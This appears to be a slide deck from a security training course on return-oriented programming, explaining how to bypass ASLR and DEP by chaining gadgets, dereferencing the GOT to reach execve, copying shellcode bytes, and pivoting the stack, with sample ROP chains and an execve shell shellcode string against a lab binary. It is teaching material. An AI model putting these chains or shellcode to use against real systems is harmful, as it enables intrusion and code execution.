08 - Return Oriented Programming, the chosen one

Return Oriented Programming
The chosen one
Alex Moneger
Security Engineer

Introduction
 ROP = Return Oriented Programming
 Uses the “ret” instruction to drive the execution flow
 Allows to bypass ASLR and DEP
 Relies on the fact that .text section is at a fixed address
 Used in all modern exploits
© 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 2

Refresher
 Ret2libc uses function addresses at known locations
 Never executes code on the stack
 Problem: ASLR randomizes the addresses
 Any other fixed address candidates?

General concepts

Non-randomized addresses
 Check the randomization again:
cisco@kali:~/src/seccon/ch8$ ./aslr
Stack base address: 0xbfcb9a74
Heap base address: 0x8cbd008
Memcpy libc address: 0xb76ad9a0
Code section address: 0x804857e
Data section address: 0x80498d0
RO data section address: 0x8048670
cisco@kali:~/src/seccon/ch8$ ./aslr
Stack base address: 0xbfd14d04
Heap base address: 0x85d7008
Memcpy libc address: 0xb76ce9a0
Code section address: 0x804857e
Data section address: 0x80498d0
RO data section address: 0x8048670
 With ASLR enabled, .text is not randomized

Impact
 .text section is not randomized
 .data section is not randomized
 PLT is a fixed offset from .text
 GOT is at fixed address, because in the same segment as .text
 Can we re-use any of this?

.text
 What can we do in .text?
 .text is the code section, so contains instructions
 How can we re-use those instructions?
 Remember pop;pop;ret construct from ret2libc?
 We can re-use any instructions with a trailing “ret”
 This let’s us keep control of the execution stack

BoF is control of eip,
ROP is control of esp

Visual flow
 I want to add 2 values together
 Then put that value at a memory
address
 i.e: 4 (eax) + 3 (ebx) = 7 (eax)
 0x1234 (mem) = 7 (eax)
&mov mem reg ; ret
0x1234
&pop;ret
&add reg reg; ret
3
4
&pop;pop;ret
mov; ret
pop reg
ret
add; ret
pop reg
pop reg

Steps
1. Know what you want to achieve (hardest)
2. Have a vague low-level idea of how to do it
3. Find gadgets
4. Find a way to stitch them together
5. Debug
6. Exploit

Finding instructions
 Find all “ret”s in a program “xc3”
 Disassemble backwards (pick a reasonable amount of instructions)
 Set of instructions
 Referred to as “gadgets”
 That gives you a set you can play with

Finding instructions
1. Use objdump
 Suboptimal, requires ret instruction to be semantically correct
2. Search for “xc3” opcode manually and disassemble back from there
 Lot of manual work
3. Use a proper tool
 We’ll use a tool, for once ;)

Ropeme
 Ropeme disassembles backwards a number of instructions
 Allows you to search for gadgets using wildcards:
cisco@kali:~/src/seccon/ch8$ ropshell.py
Simple ROP interactive shell: [generate, load, search] gadgets
ROPeMe> generate ch6 4
Generating gadgets for ch6 with backward depth=4
It may take few minutes depends on the depth and file size...
Processing code block 1/1
Generated 93 gadgets
Dumping asm gadgets to file: ch6.ggt ...
OK
ROPeMe> search add eax %
Searching for ROP gadget: add eax % with constraints: []
0x80482fcL: add eax 0x3ee8 ; add [eax+0x5b] bl ; leave ;;
0x80485f8L: add eax 0x83038745 ; add al 0x6e ;;
ROPeMe> search pop % -leave
Searching for ROP gadget: pop % with constraints: ['-leave']
0x8048528L: pop ebp ;;
0x8048495L: pop ebx ; pop edi ; pop ebp ;;

Useful gadgets
 Pop reg => put a value in reg
 add [reg1] reg2 => add reg2 to memory address in reg1
 mov [reg1] reg2 => mov reg2 into memory address in reg1
 Call reg => call the address in reg
 Jmp reg => jump to address

Put gadgets together
 Create high level gadgets, by putting low level gadgets together:
# Write value in eax to memory
0x8048502L: pop ebx ; pop ebp ;;
0x80484feL: add [ebx+0x5d5b04c4] eax ;;
# Load memory value into eax
0x8048502L: pop ebx ; pop ebp ;;
0x804875eL: add eax [ebx-0xb8a0008] ; add esp 0x4 ; pop ebx ; pop ebp ;;
# Load eax with a value
0x804dad5L: mov eax edi ; pop ebx ; pop esi ; pop edi ; pop ebp ;;
 It’s up to you to find meaningful gadgets to use
 Use those high level gadgets to build payloads

ROP flow

Stages
 ROP exploit generally has multiple stages
1. Stage 0:
 Stabilize exploit
 Take control of eip
 Copy payload into fake frame
 Dereference GOT
2. Stack pivot from stage 0 to stage 1

Stage 1
3. Stage 1:
 Change memory permissions (optional)
 Execute payload
 Cleanup (optional)

Getting function addresses

GOT dereferencing
 Remember the GOT?
 Grab an arbitrary address from it
 Add the libc offset with the function you want
 Call it
 Or write it to mem, and call it later

Example
 Example:
 Find execve based on strcpy (0xb7ed8b70)
 &Strcpy GOT = 0x08049fec
 &Execve – &strcpy = 0x27b10
# Get the GOT address of strcpy (0x08049fec) into ebx
0x8052b9dL: pop ebx ; lea eax [edx+eax*8] ;;
# Move the content of GOT entry (&strcpy) into edx
0x8052b98L: mov edx [ebx] ; pop ebx ; lea eax [edx+eax*8] ;;
# Move delta between functions 0x27b10 into ecx
0x8060883L: pop ecx ;;
# Add &strcpy with offset = &execve!
0x8061ddaL: add edx ecx;;
0x8061dda
0x27b10
0x8060883
0x41414141
0x8052b98
0x08049fec
0x8052b9d

Calling the function
 Calling the dereferenced function (value in edx)
# Call register
0x804c244L: call edx ; leave ;;
 Writing the dereferenced function somewhere (ie: 0x12345678)
# Move address value (0x12345678) into eax
0x8058ae0L: pop eax ; pop ebx ;;
# Move adx to that address
0x8056579L: mov [eax] edx ;;

Copying payload

Stage 0
 2 options:
 Build shellcode from pieces of memory
 Do multiple GOT dereferencing
 Both end up the same:
 Build fake stack frame to transfer control to

Copying shellcode
 Find individual shellcode bytes in memory
 Use a copy function (i.e: strcpy) to copy bytes from memory to fake
stack frame
 Ropc can give you the memory addresses of shellcode bytes
cisco@kali:~/src/seccon/ch8$ ropc -s
"x6ax0bx58x99x52x66x68x2dx70x89xe1x52x6ax68x68x2fx62x61x73x68x2fx62x69x6ex89xe3x52x51x53x89xe1xc
dx80" -f ch8
0x00000000 -> "x6a" (NOT FOUND)
0x080485b4 -> "x0b"
0x080480f8 -> "x58"
0x08048378 -> "x99"
0x0804836a -> "x52"

Building payload
 Identify fake stack
 Find address of functions your interested in
 Copy function addresses to fake stack
 Copy arguments to fake stack
 Stack pivot to new stack

Stack pivoting

Stack pivoting
 Build a fake stack in memory with your payload
 Move to it to start execution of payload
 Called stack pivoting, because you lead the execution flow to your own
stack

How to do it?
 You need a way to control the stack pointer
 Esp needs to be controlled, and redirected
 Useful gadgets:
Eax contains the value of your new frame
0x8055c61L: xchg esp eax ;;
# leave = mov esp, ebp; pop ebp; Control ebp = control esp
0x8049844L: leave ;;

What it looks like
 Stage 0 “copying” stack  Stage 1 “payload” stack
0x8061dda
0x27b10
0x8060883
0x41414141
0x8052b98
0x08049fec
0x8052b9d
Esp = 0x12345678
Esp = 0x08048a00 0x12345678 – 0x4
Leave; ret
Copy data
Copy data
Copy data
Copy data
Copy data

That’s it!

Exercise time!
 Find what protections are active on ch8
 No source, but I left symbols ;)
 Reverse it
 Find the vulnerability
 Exploit it
 You probably wont finish this today, but keep chewing on it ;)

08 - Return Oriented Programming, the chosen one

Recommended

Recommended

More Related Content

What's hot

What's hot (20)

Similar to 08 - Return Oriented Programming, the chosen one

Similar to 08 - Return Oriented Programming, the chosen one (20)

More from Alexandre Moneger

More from Alexandre Moneger (6)

Recently uploaded

Recently uploaded (20)

08 - Return Oriented Programming, the chosen one